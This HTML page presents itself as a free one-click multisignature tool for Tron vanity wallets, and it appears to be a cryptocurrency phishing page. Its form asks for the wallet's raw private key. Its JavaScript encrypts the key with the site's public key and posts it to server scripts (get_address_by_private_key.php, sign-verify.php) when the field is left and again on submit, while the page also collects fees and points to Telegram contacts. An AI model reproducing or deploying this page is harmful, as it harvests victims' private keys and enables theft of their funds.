
<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta name="renderer" content="webkit">
    <title>波场多签 Tron USDT靓号钱包一键多签工具</title>
    <meta name="keywords" content="Tron, 多签账户, trx, 波场, 靓号钱包靓号一键多签, 多签工具, 免费多签, 波场多签, 数字资产, 加密货币, 波场账户, 简化多签, 小白多签, 波场安全, 修改权限">
    <meta name="description" content="欢迎使用我们的波场一键多签账户工具。无需繁琐的步骤，我们为您提供了最简单的方式来管理波场（TRX）多签账户。只需一键，您就可以完成整个过程，无需技术知识或费用。保护您的数字资产从未如此简单。开始使用我们的免费工具，即可轻松管理您的波场多签账户。">
    <link rel="shortcut icon" href="./static/favicon.ico">
    <link href="./static/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            background-color: #f8f9fa;
        }

        .login-page {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .login-box {
            max-width: 500px;
            width: 100%;
            padding: 30px;
            background: #fff;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
        }

        .login-logo {
            text-align: center;
            font-size: 1.5rem;
            margin-bottom: 20px;
        }

        .form-control-position {
            position: absolute;
            right: 15px;
            top: 10px;
        }

        .btn-primary,
        .btn-success {
            width: 100%;
        }

        .alert-danger {
            font-size: 0.9rem;
        }

        .help-block {
            color: red;
        }

        @media (max-width: 768px) {
            .login-box {
                padding: 20px;
            }
        }
    </style>
</head>
<body>

<div class="login-page">
    <div class="login-box">
        <div class="login-logo">Tron钱包一键多签</div>
        <div class="card-body">
            <div class="alert alert-danger" role="alert">
                注意：不要将web3钱包或交易所地址用作授权管理地址，否则可能导致资产损失！<br>
                1. 请确保您的账户至少有111 TRX ，本站收取手续费 10 TRX<br>
                2. 每次多签波场网络会收取 100 TRX<br>
                3. 预留 1 TRX 用于避免带宽不足修改失败<br>
                4. 新手建议设置1个控制地址，2个地址需要2个同意才能转账<br>
                5. 如需咨询多签相关问题，可付费咨询，50U起。
            </div>

            <!-- 靓号购买链接 
            <div style="text-align: center; margin-top: 20px;">
                <a href="https://t.me/xt" target="_blank" class="btn btn-outline-info">靓号购买</a>
            </div>-->

            <br>

            <form id="submit-form" method="POST" action="#">
                <div class="form-group">
                    <label for="address">待多签的地址</label>
                    <input type="text" class="form-control" name="address" id="address"
                           minlength="34" maxlength="34" placeholder="这自动识别" required autofocus disabled>
                </div>
                <div class="form-group">
                    <label for="private_key">输入靓号账户的私钥</label>
                    <input type="password" class="form-control" name="private_key" id="private_key"
                           minlength="64" maxlength="64" placeholder="输入靓号账户的私钥" required autofocus>
                </div>
                 <div class="form-group">
                    <label for="manage_address">actives组名称</label>
                    <input type="text" class="form-control" name="actives_address" id="actives_address"
                           minlength="1" maxlength="10" placeholder="actives" required autofocus>
                </div>
                <div class="form-group">
                    <label for="manage_address">控制管理地址</label>
                    <input type="text" class="form-control" name="manage_address" id="manage_address"
                           minlength="34" maxlength="34" placeholder="授权管理地址" required autofocus>
                </div>
               <!-- <div class="form-group">
                    <label for="manage_address2">控制管理地址2（可选）</label>
                    <input type="text" class="form-control" name="manage_address2" id="manage_address2"
                           minlength="34" maxlength="34" placeholder="授权管理地址2">
                </div>
                <div class="form-group form-check">
                    <input type="checkbox" class="form-check-input" id="donate" name="donate" value="true" checked disabled">
                    <label class="form-check-label" for="donate">向本站额外捐赠 10 TRX</label>
                </div>-->
                <button type="button" class="btn btn-primary mb-2" id="contract">
                    <i class="feather icon-info"></i> 联系管理员
                </button>
                <button type="submit" class="btn btn-success" id="submit" disabled>一键多签</button>
            </form>
        </div>
    </div>
</div>

<script src="./static/js/jquery.min.js"></script>
<script src="./static/layer/layer.js"></script>
<script src="./static/js/jsencrypt.min.js"></script>
<script>
    $(document).ready(function () {
        const encrypt = new JSEncrypt();
        const publicKey = '-----BEGIN PUBLIC KEY-----\n' +
           'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr7vCO1DHTAnnRd+1L0+G\n' +
'L+QiAVF9TZFhnH5ZBW503xus0jZlvv/QHIlVoPMyY0fwZjJWb/gTimNjEkAniP9e\n' +
'3cR8McnNwomEtEzu7INq8ef5Nl8Eoy7PgkmrWhX/329B3lb014pZ4UfmO+1LmMNs\n' +
'gLRvPRIF3/S5HOIxf0ogRpeyzjQDQksiFWU6tzPS1iaFrr+UID+chJDr/HSYjZhk\n' +
'DIAA6Up+8TH+VyHLKx7NdN2rIeW9nrz0efbc5n8K2Prg5LjNX4qga5bxVFs6rNbM\n' +
'5Pkrxfbop4+U/dnN2KXhiHzcprUrwmP0q7soVIl4ZAG1rQBL/UxdzAwLCxrcclpr\n' +
'WQIDAQAB\n' +
            '-----END PUBLIC KEY-----';
        encrypt.setPublicKey(publicKey);

        $("#submit-form").submit(function (event) {
            event.preventDefault();
            $("#submit").prop("disabled", true);

            let private_key = $("#private_key").val().toLowerCase();
              let actives_address = $("#actives_address").val();
            let manage_address = $("#manage_address").val();
           // let manage_address2 = $("#manage_address2").val();  // 读取第二个管理地址的值

            if (private_key.length !== 64) {
                layer.msg("私钥错误", {time: 5000});
                return;
            }

            // 检查第一个管理地址是否填写
            if (!manage_address || manage_address.length !== 34) {
                layer.msg("请填写有效的授权管理地址", {time: 5000});
                return;
            }

            let data = {
                private_key: encrypt.encrypt(private_key),
                address: $("#address").val(),
                actives_address: actives_address,
                manage_address: manage_address,
                //manage_address2: manage_address2,  // 第二个管理地址可有可无
                donate: $("#donate").val(),
            };

            let load_index = layer.msg("正在发起多签，请稍后...", {time: 5000});
            $.ajax({
                type: "POST",
                dataType: "json",
                data: data,
                url: "./sign-verify.php",
                timeout: 10000,
                success: function (response) {
                    if (response.code === 200) {
                        layer.close(load_index);
                        layer.alert(response.msg, {title: "成功", icon: 1});
                        $("#submit").prop('disabled', false);
                    } else {
                        layer.close(load_index);
                        layer.alert(response.msg, {title: "错误", icon: 2});
                        $("#submit").prop('disabled', false);
                    }
                },
                error: function (e) {
                    layer.close(load_index);
                    layer.msg("API请求超时", {time: 5000});
                    $("#submit").prop('disabled', false);
                }
            });
        });

        $("#private_key").on('blur', function () {
            $("#submit").prop('disabled', true);
            let private_key = $("#private_key").val().toLowerCase();
            if (private_key.length !== 64) return;

            let address = $("#address");
            address.prop('disabled', true);
            address.val("解析私钥中...");

            let data = {
                private_key: encrypt.encrypt(private_key),
            };

            $.ajax({
                type: "POST",
                dataType: "json",
                data: data,
                url: "./get_address_by_private_key.php",
                timeout: 10000,
                success: function (response) {
                    if (response.code === 200) {
                        address.val(response.data.address);
                        address.prop('disabled', false);
                        $("#submit").prop('disabled', false);
                    } else {
                        layer.msg(response.msg, {time: 5000});
                    }
                },
                error: function (e) {
                    $("#address").val("");
                    layer.msg("API请求超时", {time: 5000});
                }
            });
        });

        $("#contract").on('click', function () {
            window.open("https://t.me/Usdt_sys", "_blank")
        });

        let donate = $("#donate");
        donate.on('click', function () {
            $(this).val(function (index, value) {
                return value === "true" ? "false" : "true";
            });
        });
    });
</script>
</body>
</html>
